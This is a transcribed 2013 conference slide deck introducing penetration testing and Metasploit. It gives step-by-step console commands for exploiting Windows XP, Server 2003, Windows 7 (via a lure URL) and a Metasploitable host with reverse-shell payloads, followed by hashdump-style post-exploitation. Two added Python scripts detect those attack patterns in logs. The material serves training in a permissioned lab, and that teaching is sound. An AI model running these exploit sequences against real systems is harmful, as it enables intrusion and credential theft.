1.
PENETRATION TESTING AND METASPLOIT BASIC
Presented by
Syarif
Indonesia Creative Open Source Software ( ICrOSS ) 2013
Jakarta, April 25 2013
Balai Kartini
3.
Whoami
• Just myself : http://fl3x.us ; @fl3xu5
• InfoSec Enthusiast & Trainer
• Lecturer & Assistant Manager
• CyberCrime Investigator
4.
Why Pentest ?
• Millions of dollars have been invested in security programs to protect critical infrastructure and prevent data breaches *1)
• A penetration test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
5.
What's Penetration Testing
• A method to evaluate the security of a computer system / network
• Practice ( attacking ) an IT system like a 'hacker' does
• Find security holes ( weaknesses )
• Bypass security mechanisms
• Compromise an organization's IT system security
Must have permission from the IT system owner !
Illegal activity puts you in jail
6.
Ethics
• Think before act
• Don’t be stupid
• Don’t be malicious
7.
Pentest Phases
• Information Gathering
• Vulnerability Analysis
• Exploitation
• Post Exploitation
• Reporting
8.
<< back|track overview
• The Most Advanced Linux Security Distribution
• Open Source & always will be
• Developed for Security Professionals
• Real World Pentesting Tools
12.
What's Metasploit
• Not just a tool, but an entire framework *1)
• An open source platform for writing security tools and exploits *2)
• Easily build attack vectors by combining its exploits, payloads and encoders
• Create and execute more advanced attacks
• Ruby based
16.
Metasploit Terminology
• Exploit : code that allows a pentester to take advantage of a flaw within a system, application, or service *1)
• Payload : code that we want the target system to execute ( a few commands to be executed on the target system ) *1)
• Shellcode : a set of instructions used as a payload when exploitation occurs *1)
• Module : a piece of software that can be used by Metasploit *1)
• Listener : a component that waits for an incoming connection *1)
17.
How does exploitation work ?
1. The attacker sends the exploit + payload to the vulnerable server
2. The exploit runs, then the payload runs
3. Upload / Download data
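The sequence on this slide (exploit in, payload out) has a network footprint a defender can look for: the vulnerable server first receives a connection on a service port and then, shortly afterwards, opens a connection back to the same peer, which is exactly what a reverse_tcp payload does (4444 is Metasploit's default LPORT for that payload when none is set). The following Python script is an added example, not from the slides and not Metasploit code; it runs over constructed connection-log lines that reuse the lab addresses from the deck and flags that inbound-then-callback pattern. The log format is an assumption. The same rule covers the distcc case from the Metasploitable slide (service port 3632) and deliberately does not match the Windows 7 browser case, where the victim initiates both connections itself.

```python
"""Added example (not part of the slides): flag the "exploit in, payload calls
back out" pattern over connection logs.  The log lines below are constructed
to reuse the lab addresses from the deck; the line format is an assumption."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: timestamp src_ip src_port dst_ip dst_port proto
SAMPLE_LOG = """\
2013-04-25T10:00:01 172.16.150.169 51234 172.16.150.165 445 tcp
2013-04-25T10:00:02 172.16.150.165 1042 172.16.150.169 4444 tcp
2013-04-25T10:05:00 172.16.150.170 49152 172.16.150.169 80 tcp
2013-04-25T10:05:01 172.16.150.170 49153 172.16.150.169 443 tcp
2013-04-25T10:10:00 172.16.150.169 51300 172.16.150.171 3632 tcp
2013-04-25T10:10:01 172.16.150.171 38011 172.16.150.169 4444 tcp
2013-04-25T11:00:00 172.16.150.165 1050 172.16.150.167 445 tcp
"""


def parse_line(line):
    """Split one log line into (timestamp, src, sport, dst, dport, proto)."""
    ts, src, sport, dst, dport, proto = line.split()
    return datetime.fromisoformat(ts), src, int(sport), dst, int(dport), proto


def find_callbacks(log_text, window_seconds=60):
    """Return one hit per connection where host H opens a connection to peer P
    within `window_seconds` after P connected to H.  Each hit is
    (victim, peer, service_port_hit, callback_port, delay_seconds)."""
    events = sorted((parse_line(ln) for ln in log_text.splitlines() if ln.strip()),
                    key=lambda e: e[0])
    # recent[(receiver, sender)] -> list of (timestamp, dst_port) seen so far
    recent = defaultdict(list)
    window = timedelta(seconds=window_seconds)
    hits = []
    for ts, src, sport, dst, dport, proto in events:
        # Was the current source recently contacted by the current destination?
        for prior_ts, service_port in recent[(src, dst)]:
            if timedelta(0) <= ts - prior_ts <= window:
                hits.append((src, dst, service_port, dport,
                             (ts - prior_ts).total_seconds()))
                break
        recent[(dst, src)].append((ts, dport))
    return hits


if __name__ == "__main__":
    for victim, peer, svc, cb, delay in find_callbacks(SAMPLE_LOG):
        print(f"{victim} received {peer} on port {svc}, then called back to "
              f"{peer}:{cb} after {delay:.0f}s")
```

In a real deployment the input would come from firewall, NetFlow or Zeek conn logs, the window would be widened to a few minutes, and protocols that legitimately connect back (active-mode FTP, some RPC services) would be allowlisted. The check matches any bidirectional pair, so a peer reconnecting to the host after the callback is reported too; the ports in the hit tell the two apart.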
18.
Traditional Pentest Vs Metasploit
Traditional Pentest :
• Public Exploit Gathering
• Change offsets
• Replace ShellCode
Metasploit for Pentest :
• Load Metasploit
• Choose the target OS
• Use exploit
• SET Payload
• Execute
19.
Meterpreter
• Used as a payload after a vulnerability is exploited *1)
• Improves post exploitation
20.
Meterpreter
Exploiting a vulnerability -> Select meterpreter as the payload -> meterpreter shell
27.
Pentest Scenario
• Set network adapter : NAT
• Firewall & Windows update : OFF
• Fresh OS installed
• startx
28.
OS in the Lab
• BackTrack 5 R3 : IP address 172.16.150.169
• Windows XP SP2 : IP address 172.16.150.165
• Windows 2003 Server : IP address 172.16.150.167
• Windows 7 : IP address 172.16.150.170
• Ubuntu Linux 8.04 ( Metasploitable ) : IP address 172.16.150.171
29.
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
30.
Windows XP Post Exploitation
• msf exploit(ms08_067_netapi) > sessions -i 1
• meterpreter > getsystem -h
• meterpreter > getuid
• meterpreter > hashdump
31.
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
32.
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim opens the URL http://172.16.150.169:80/miyabi-hot.avi
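The lure on this slide is a URL ending in .avi, but the browser exploit module behind it answers the request with HTML and script, not a video. That mismatch between what the path promises and what the server sends is visible in a web proxy log, so the following Python script is an added example, not from the slides and not Metasploit code, that flags such responses. The log lines and their format are constructed, reusing the lab addresses from the deck; the extension and content-type lists are assumptions to be tuned per environment.

```python
"""Added example (not part of the slides): flag proxy log entries where a
media-looking URL was served with page or script content.  Log format and
lines are constructed."""
import re
from urllib.parse import urlsplit

# Constructed sample: timestamp client_ip method url status content_type
SAMPLE_PROXY_LOG = """\
2013-04-25T10:05:00 172.16.150.170 GET http://172.16.150.169:80/miyabi-hot.avi 200 text/html
2013-04-25T10:06:00 172.16.150.170 GET http://intranet.example.test/report.pdf 200 application/pdf
2013-04-25T10:07:00 172.16.150.165 GET http://intranet.example.test/video.avi 200 video/x-msvideo
2013-04-25T10:08:00 172.16.150.170 GET http://intranet.example.test/index.html 200 text/html
2013-04-25T10:09:00 172.16.150.165 GET http://intranet.example.test/clip.avi?x=1 404 text/html
"""

# Extensions a user reads as a passive download (assumed list), and content
# types the browser will render as a page or execute instead.
MEDIA_EXTENSIONS = {"avi", "mp4", "mkv", "wmv", "mov", "mp3",
                    "jpg", "jpeg", "png", "gif", "pdf", "zip"}
ACTIVE_TYPES = {"text/html", "application/xhtml+xml",
                "text/javascript", "application/javascript"}


def parse_proxy_line(line):
    """Split one constructed proxy log line into a dict; normalises the
    content type by dropping parameters such as ';charset=...'."""
    ts, client, method, url, status, ctype = line.split()
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "ctype": ctype.split(";")[0].strip().lower()}


def path_extension(url):
    """Extension of the URL path (query string ignored), lower-cased, or ''."""
    m = re.search(r"\.([A-Za-z0-9]+)$", urlsplit(url).path)
    return m.group(1).lower() if m else ""


def find_masquerades(log_text):
    """Return (client, url, extension, content_type) for each successful
    response whose path looks like media but whose body is page/script content.
    Error pages (non-200) are skipped: a 404 for clip.avi is legitimately HTML."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_proxy_line(line)
        ext = path_extension(rec["url"])
        if rec["status"] == 200 and ext in MEDIA_EXTENSIONS and rec["ctype"] in ACTIVE_TYPES:
            hits.append((rec["client"], rec["url"], ext, rec["ctype"]))
    return hits


if __name__ == "__main__":
    for client, url, ext, ctype in find_masquerades(SAMPLE_PROXY_LOG):
        print(f"{client} fetched {url}: .{ext} path served as {ctype}")
```

Only the lure URL is reported: the real video, the PDF and the HTML page match their extensions, and the 404 response is ignored because error pages are HTML regardless of the requested path. A proxy that also records the response's first bytes could extend the rule with magic-number checks rather than trusting the declared Content-Type.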
34.
Ubuntu 8.04 Metasploitable Exploitation
• msf > search distcc
• msf > use exploit/unix/misc/distcc_exec
• msf exploit(distcc_exec) > show payloads
• msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse
• msf exploit(distcc_exec) > show options
• msf exploit(distcc_exec) > set RHOST 172.16.150.171
• msf exploit(distcc_exec) > set LHOST 172.16.150.169
• msf exploit(distcc_exec) > exploit
35.
Any Question ?
Contact me
• Website : http://fl3x.us
• Twitter : @fl3xu5
36.
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
37.
References
• 1. Metasploit: The Penetration Tester's Guide, by David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni
• 2. http://www.metasploit.com
• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
38.
Challenge in 45 minutes :)
• Connect your Windows OS to the TP-LINK Access Point over DHCP
• BackTrack 5 R3 VMware setting :
• Network adapter : Bridged
• Get 4 pictures by yourself & shut down the targets ( if you can :p )
• Win the Polo T-Shirt indobacktrack